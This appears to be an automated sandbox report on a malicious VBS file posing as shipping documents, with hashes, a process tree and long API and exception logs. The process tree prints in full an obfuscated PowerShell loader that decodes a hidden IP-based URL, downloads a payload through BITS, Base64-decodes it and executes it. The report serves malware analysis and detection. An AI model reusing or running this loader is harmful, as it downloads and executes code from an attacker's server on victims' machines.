Summary | ZeroBOX

SHIPPING_COPY_DOCUMENTS-QRYTR-282737-OLSKJWEJ_127KB_00000002822333333.vbs

Generic Malware Antivirus
Category Machine Started Completed
FILE s1_win7_x6402 July 13, 2023, 8:56 a.m. July 13, 2023, 8:59 a.m.
Size 5.3KB
Type ASCII text, with CRLF line terminators
MD5 0bbe430413435af44cd3af7dd542d158
SHA256 d6d6d837cf218e5f89c6eb733437a7a9f8fc74e43545409fd487c16d83808bed
CRC32 23CDF84A
ssdeep 96:bDW4xFZiEBpDD/tIPLC0kn5afwKFdKuFf3Tr/wL7Bb+cXfU49U5BAPA0p4:bjx/13DtIPLb6KfFfH/gw5CXy
Yara None matched

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\SHIPPING_COPY_DOCUMENTS-QRYTR-282737-OLSKJWEJ_127KB_00000002822333333.vbs

    3048
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Sprg9 ([String]$Sydyemene4){$Sidingsku=$Sydyemene4.toCharArray();For($Propolis46=5; $Propolis46 -lt $Sidingsku.count-1; $Propolis46+=(5+1)){$rufulousna+=$Sidingsku[$Propolis46]};$rufulousna;}$Volu=Sprg9 ' WankhCeliotSchelt malep Fagu:Opspa/Obtai/ Skol9March1Sacra.gertr2Woolm4 Redu4 Snig. Alec1Misal9 Drin7concu. Impe9 Llin/LabounOmkoseSpracwnyhed/TndstUunpronIsidosMellelSkatt. DumpjdiplaaSternvSophraFempe ';$rufulousna01=Sprg9 ' TilsiSpksteBarbexBesom ';$Telo = Sprg9 'Wagne\Iconos poiny Kabes CambwBrassoCarbowfulfi6Super4Judic\AfmnsW Aflaistregnhypomd OveroPhospw UtopsKrapfP Ansto AlpiwFestfe BoggrAsphyS antih CaraePensil AntalHekse\Emeliv Erhv1 Baue.Taskm0Modif\BraunpUdtnkoHumanwUddykeCharer QuilsafstihMelipeAfhorlRomtol Besy. PreaeHusarx Socie Solv ';.($rufulousna01) (Sprg9 ' Hejs$BuldeTRevera AviliEtatslFlyvso Bals2 Hype= Foru$ Quilekompln Trisv Subr:Diariw FuseiAmanin BanadAurorifraterBlodf ') ;.($rufulousna01) (Sprg9 'Uddat$ FlawT Conte ArchlCarisoMarkr= Duef$GraniT OrddatommeiAeroplRansaoMckee2 Beas+Escap$ RhopT KonseFertil PuntoExoto ') ;.($rufulousna01) (Sprg9 'Deter$RibbeS AlnivNondea SeafrDixiesBismek GenbrSucce semio= shov unde( Rmet(Blitzg SkinwOversmshinwiFordr kvadw KystiContun Klen3 Deku2 Brne_ OverpUnresr Vegeo ThrecSemiheAntimsMothwsJoggi Trygh-NgaioF Unga DawnPAltarr GenfoUnhelcSenateKotowsAntiasvillaIViscidRejse=Udbls$ Tilh{UndefP MistIStemmD Noxi} Morp)Prveu.VelkeCRewaroDivismLineam Aguaa Duodn progd PsitL SammiTheomnMidfre Drag)Esdra part-Pastis JulepSirell Tilsi PejltFrost Norma[Craftc Skolh Hecta Anaer Tiko] Udto3 Ooph4 Udga ');.($rufulousna01) (Sprg9 ' Fugl$ CampaSkyttfmolinsaarhukFromeeDekladSnildsGrfab Trip= Ring Rispe$JegerS SunbvPlumeaMomskr RegisUnconkBenstr Over[ Data$efterSVesicv RetsaAksiorCreossKonomk SinorSaffa.Ughs c bosso TousuChairnTypehtForda-Airdr2Chlor]Orang ');.($rufulousna01) (Sprg9 'Skrid$PhospWStenba Landd dauniNatioo PostpLeucomWindbu UnbanForeltDsigh= Kern(bydefTOnaneekondosFlourtOffse- OverPUnlina PanetElforh tran Subge$ AngiT Vaske LunglIndsko Belb)Espie Disco-VrktjAPreben Eased Phil Tandh(Dobbe[ AntiIUnclenTittutBndelP MisltBriber Bern]Bediz:Bight:BistasOpruliSubinz Bambe ampe Emne-BiogreMors qSylla Probl8Posta) Rumi ') ;if ($Wadiopmunt) {.$Telo $afskeds;} else {;$rufulousna00=Sprg9 ' MarkS ElevtSuggea ElekrConset Dels-TuggeB Mesoi StratBiogrs DesiTConchr IdeaaDysgenAngoss FeltfAnmele Outbr Hipp Jule-SekslSSinoloFremsu Strir Counc SimoeUncin pret$RepulV caskoCorral HexauUrger Haplo-TubfiDLimemeBrydesLocaltDesiniSansen HenfaCampit Anali StveoPachyn Shar Subco$ SlatTCrossaKorali SikklParagoTelev2 Spec ';.($rufulousna01) (Sprg9 'Bortf$FanliT NanoaGyse i VinnlKaryoo Home2Tuber=Skjol$HaunteRattlnLatesvSkval:outtha PlanpEpeirp MeladHandla SolotTaktlaUnpre ') ;.($rufulousna01) (Sprg9 ' VersIMerchmScrippSamfro Histr EjentDamec-BlaamMZonuloPannadBestyu StrilHalefe Bass IndsiBOeer i GlostBinapsDactyT KendrAfganarangsnUndersPhaeofMestreIsolerPrein ') ;$Tailo2=$Tailo2+'\Geadepha.Tri';while (-not $gvinkele) {.($rufulousna01) (Sprg9 'Minim$Demong Finav Intei SeminInappk HandeTintnl PriseOpsli= Dekl( HirpT Rumse Gotrs HalvtComme- VandP BekvaHarputTeca hFrowa Char$ DiphTAmuttaRygkliMrkedlSawbao cock2 Diso)Troll ') ;.($rufulousna01) $rufulousna00;.($rufulousna01) (Sprg9 ' itseSBivuatSholeaSignarSkilltBassi-SeamaS AnchlSortee IngeeSphenpaouad Hjemm5Risen ');}.($rufulousna01) (Sprg9 ' Affe$ StrmS ObjepFejemr PilogDrive stets=svejs calcGHandwe kongtClach- BengCHjlndo FejlnRetrotDebuteVandbn StictBagta Genne$ChalyTTonesa UskniInfoll ObtuoHstpa2Spado ');.($rufulousna01) (Sprg9 'Laant$InhalK AtheoKujonnCampskSutoru OpfibPrema Aksel=Alkal centr[ KompS Muriy Spers Marst Berbe Gorkm Flas.OveraCAmmesoMyocon Assyv Lepte Rmmer Ddmat Impu]Sasch:Under: SydaFTidssrHumidoOpvismKerneBLysrea EnewsSlagpeSamse6 Sent4FourtSTillrt Resir Anchi Terrn Glung Elev(Alleg$ArchhSRewasp EurorKyu SgHusma)Curar ');.($rufulousna01) (Sprg9 'Pighe$ FraprSkrivuGotchfEnebouBaccalinvoko UdfluFlancs HjlpnCoasta Kake2 Dump Inka=Veste ges [FortjSbruniy langs Tyktt biolePyrommArbor.CarriTArbeje Antox ClautCalvi.talloE Bentn BalecOpkoboGlasudMeloti UdvenHomozgsympa]Subsu: Eksp:VaderACoquiS KundCAlluvI SecrIBoxer.BladhGHetere Recot AchiS Halvt quinr Patti JegsnFalmegBleph( repr$SeiyuKInquaoRedpon Fritk Skudu DensbUsand)Sextu ');.($rufulousna01) (Sprg9 'Impas$ TronP UngteKvindrGennecDuran1Curia2Conce1 Apes=Tagre$frostr Blafu GgehfLegaru armbl lednopapilu SanisFornunKrebia Enke2 Humm.DeipasLowliuPyraubStadssYakutt Knarr TabeiDibranDdssyg Kali(Sortk2Catas0Norte2 Kiru2 Ford4 Velb7rille, sigt2 Snke5 Cass0 folk5Letva2Compl) Gaar ');.($rufulousna01) $Perc121;}"

      2196

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
164.124.101.2 Active Moloch
91.244.197.9 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00648200
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00647f40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00647f40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00647f40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00647b40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00647b40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00647b40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00647b40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00647b40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00647b40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00647640
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00647640
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00647640
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00648140
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00648140
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00648140
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00647d00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00648140
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00648140
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00648140
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00648140
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00648140
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00648140
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00648140
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00648000
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00648000
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00648000
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00648000
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00648000
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00648000
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00648000
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00648000
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00648000
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00648000
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00648000
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00648000
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00648000
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00648000
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00647780
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00647780
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x05087468
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x05087468
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x05089468
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x05089468
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x05089468
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x05088468
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x050884a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x050884a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x050884a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x050884e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: 74 05 f3 5b 7c b1 99 1d 8e b7 00 84 e4 5e 66 a9
exception.instruction: je 0x6fc7fdc
exception.exception_code: 0x80000004
exception.symbol:
exception.address: 0x6fc7fd5
registers.esp: 102818676
registers.edi: 117210658
registers.eax: 84956288
registers.ebp: 102818684
registers.edx: 117207040
registers.ebx: 117207040
registers.esi: 102818672
registers.ecx: 256
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: cc f0 7e 2b 1e 62 a7 b5 53 bb 1f 06 6a 36 81 eb
exception.instruction: int3
exception.exception_code: 0x80000003
exception.symbol:
exception.address: 0x6fc7fe8
registers.esp: 102818684
registers.edi: 117210658
registers.eax: 84956288
registers.ebp: 102818684
registers.edx: 117207040
registers.ebx: 117207040
registers.esi: 2001474698
registers.ecx: 117210996
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: 76 05 e9 e5 83 49 6c b7 68 19 d3 6b 95 a8 33 83
exception.instruction: jbe 0x6fc801e
exception.exception_code: 0x80000004
exception.symbol:
exception.address: 0x6fc8017
registers.esp: 102818676
registers.edi: 117210658
registers.eax: 102818672
registers.ebp: 102818684
registers.edx: 117207040
registers.ebx: 256
registers.esi: 2001474698
registers.ecx: 117210996
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: 75 08 ef d5 ba e6 5c 93 e1 20 95 5a 9e ab 83 d6
exception.instruction: jne 0x6fc8069
exception.exception_code: 0x80000004
exception.symbol:
exception.address: 0x6fc805f
registers.esp: 102818676
registers.edi: 117210658
registers.eax: 1961295872
registers.ebp: 102818684
registers.edx: 102818672
registers.ebx: 6181448
registers.esi: 256
registers.ecx: 16
1 0 0

__exception__

stacktrace:
GetStartupInfoA-0x10e00 kernel32+0x0 @ 0x74e70000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: 89 33 f1 be d6 3e ab 9c 00 5b 89 85 98 00 00 00
exception.instruction: mov dword ptr [ebx], esi
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6fc80a5
registers.esp: 102818680
registers.edi: 117210658
registers.eax: 1961482242
registers.ebp: 102818684
registers.edx: 1962118595
registers.ebx: 64682
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
GetStartupInfoA-0x10e00 kernel32+0x0 @ 0x74e70000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: cc ed 5b 63 7e 5e 86 d7 59 56 b1 c4 48 12 a7 db
exception.instruction: int3
exception.exception_code: 0x80000003
exception.symbol:
exception.address: 0x6fc80b5
registers.esp: 102818684
registers.edi: 117210658
registers.eax: 1961482242
registers.ebp: 102818684
registers.edx: 1962118595
registers.ebx: 4140708668
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
GetStartupInfoA-0x10e00 kernel32+0x0 @ 0x74e70000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: 89 33 ff 25 8a 98 00 5b 89 95 a5 01 00 00 ba 83
exception.instruction: mov dword ptr [ebx], esi
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6fc80dc
registers.esp: 102818680
registers.edi: 117210658
registers.eax: 1961482242
registers.ebp: 102818684
registers.edx: 1962118595
registers.ebx: 22336
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
GetStartupInfoA-0x10e00 kernel32+0x0 @ 0x74e70000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: 77 04 f4 9a 97 2a 9b ec af 8c 66 00 81 7d 7c 50
exception.instruction: ja 0x6fc8110
exception.exception_code: 0x80000004
exception.symbol:
exception.address: 0x6fc810a
registers.esp: 102818676
registers.edi: 117210658
registers.eax: 1961482242
registers.ebp: 102818684
registers.edx: 256
registers.ebx: 102818672
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
GetStartupInfoA-0x10e00 kernel32+0x0 @ 0x74e70000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: cc e8 04 28 4f 52 76 21 55 8e a1 91 6b b3 2a 88
exception.instruction: int3
exception.exception_code: 0x80000003
exception.symbol:
exception.address: 0x6fc8139
registers.esp: 102818684
registers.edi: 117210658
registers.eax: 1961482242
registers.ebp: 102818684
registers.edx: 12288
registers.ebx: 4140708668
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
GetStartupInfoA-0x10e00 kernel32+0x0 @ 0x74e70000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: cc eb d0 f3 9b 44 26 0f 6c ef 71 57 09 00 76 85
exception.instruction: int3
exception.exception_code: 0x80000003
exception.symbol:
exception.address: 0x6fc8149
registers.esp: 102818684
registers.edi: 117210658
registers.eax: 1961482242
registers.ebp: 102818684
registers.edx: 12288
registers.ebx: 4140708668
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
GetStartupInfoA-0x10e00 kernel32+0x0 @ 0x74e70000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: cc ea 57 99 e8 21 4f 4f 9f 3c 0a 5c cb 7c 95 1b
exception.instruction: int3
exception.exception_code: 0x80000003
exception.symbol:
exception.address: 0x6fc815d
registers.esp: 102818680
registers.edi: 117210658
registers.eax: 1961482242
registers.ebp: 102818684
registers.edx: 12288
registers.ebx: 4140708668
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: 89 37 ed 44 06 a1 c2 63 6b d0 24 ea 2e 61 ff a5
exception.instruction: mov dword ptr [edi], esi
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6fe0bdf
registers.esp: 102818672
registers.edi: 54251
registers.eax: 109186848
registers.ebp: 102818684
registers.edx: 1962118595
registers.ebx: 4140708668
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: 76 0a ed 12 60 3d 46 14 e4 de 73 4d 16 f5 48 7f
exception.instruction: jbe 0x6fe0c26
exception.exception_code: 0x80000004
exception.symbol:
exception.address: 0x6fe0c1a
registers.esp: 102818668
registers.edi: 256
registers.eax: 102818664
registers.ebp: 102818684
registers.edx: 1962118595
registers.ebx: 109186848
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: cc ea 5d 26 21 ba f6 43 8b 1a fe c4 59 87 a7 b8
exception.instruction: int3
exception.exception_code: 0x80000003
exception.symbol:
exception.address: 0x6fe0c35
registers.esp: 102818676
registers.edi: 117210658
registers.eax: 109186848
registers.ebp: 102818684
registers.edx: 1962118595
registers.ebx: 109186848
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: 89 3a f6 b1 24 68 c2 cb 54 b3 cd d0 7d 00 5a 81
exception.instruction: mov dword ptr [edx], edi
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6fe0c6b
registers.esp: 102818672
registers.edi: 117210658
registers.eax: 109186848
registers.ebp: 102818684
registers.edx: 11062
registers.ebx: 109186848
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: cc eb 04 2a d5 9d 30 e4 03 74 d1 e8 d6 74 0b da
exception.instruction: int3
exception.exception_code: 0x80000003
exception.symbol:
exception.address: 0x6fe0c80
registers.esp: 102818676
registers.edi: 117210658
registers.eax: 109186848
registers.ebp: 102818684
registers.edx: 1962118595
registers.ebx: 109186848
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: 75 07 f2 5e 5a 8a 78 95 66 00 84 c0 5a 80 fd 4f
exception.instruction: jne 0x6fe0cbd
exception.exception_code: 0x80000004
exception.symbol:
exception.address: 0x6fe0cb4
registers.esp: 102818668
registers.edi: 256
registers.eax: 109186848
registers.ebp: 102818684
registers.edx: 102818664
registers.ebx: 109186848
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: cc ff 23 71 10 90 30 52 ba 63 6e e2 05 81 f2 d5
exception.instruction: int3
exception.exception_code: 0x80000003
exception.symbol:
exception.address: 0x6fe0ce2
registers.esp: 102818676
registers.edi: 117210658
registers.eax: 109186848
registers.ebp: 102818684
registers.edx: 4
registers.ebx: 109186848
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: 89 32 f4 0b b1 08 06 7a 10 b9 ad 00 5a 53 bb 31
exception.instruction: mov dword ptr [edx], esi
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6fe0d01
registers.esp: 102818672
registers.edi: 117210658
registers.eax: 109186848
registers.ebp: 102818684
registers.edx: 11099
registers.ebx: 109186848
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: 89 0b f7 e5 22 a2 a0 29 00 61 ff 22 e4 cf 00 5b
exception.instruction: mov dword ptr [ebx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6fe0d26
registers.esp: 102818672
registers.edi: 117210658
registers.eax: 109186848
registers.ebp: 102818684
registers.edx: 4
registers.ebx: 63062
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: 89 30 f1 34 ad 97 4a 53 00 58 c7 03 58 71 ec cf
exception.instruction: mov dword ptr [eax], esi
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6fe0d4e
registers.esp: 102818672
registers.edi: 117210658
registers.eax: 45631
registers.ebp: 102818684
registers.edx: 1962118595
registers.ebx: 109186852
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: 89 3f f3 ad 16 12 f3 67 db 0b 00 5f 50 b8 8f 73
exception.instruction: mov dword ptr [edi], edi
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6fe0d88
registers.esp: 102818672
registers.edi: 16902
registers.eax: 109186848
registers.ebp: 102818684
registers.edx: 1962118595
registers.ebx: 109186852
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: 89 10 e9 87 b0 87 27 61 d1 98 d1 62 e1 2a ce 9d
exception.instruction: mov dword ptr [eax], edx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6fe0da4
registers.esp: 102818672
registers.edi: 117210658
registers.eax: 28623
registers.ebp: 102818684
registers.edx: 1962118595
registers.ebx: 109186852
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: 70 07 f4 55 35 e6 ef 3a ce 3d b6 00 81 f9 d7 51
exception.instruction: jo 0x6fe0de6
exception.exception_code: 0x80000004
exception.symbol:
exception.address: 0x6fe0ddd
registers.esp: 102818668
registers.edi: 117210658
registers.eax: 109186848
registers.ebp: 102818684
registers.edx: 102818664
registers.ebx: 109186852
registers.esi: 256
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: cc ea a3 63 ab 66 c5 95 db 75 76 c1 79 22 ac 9f
exception.instruction: int3
exception.exception_code: 0x80000003
exception.symbol:
exception.address: 0x6fe0dfe
registers.esp: 102818676
registers.edi: 117210658
registers.eax: 109186848
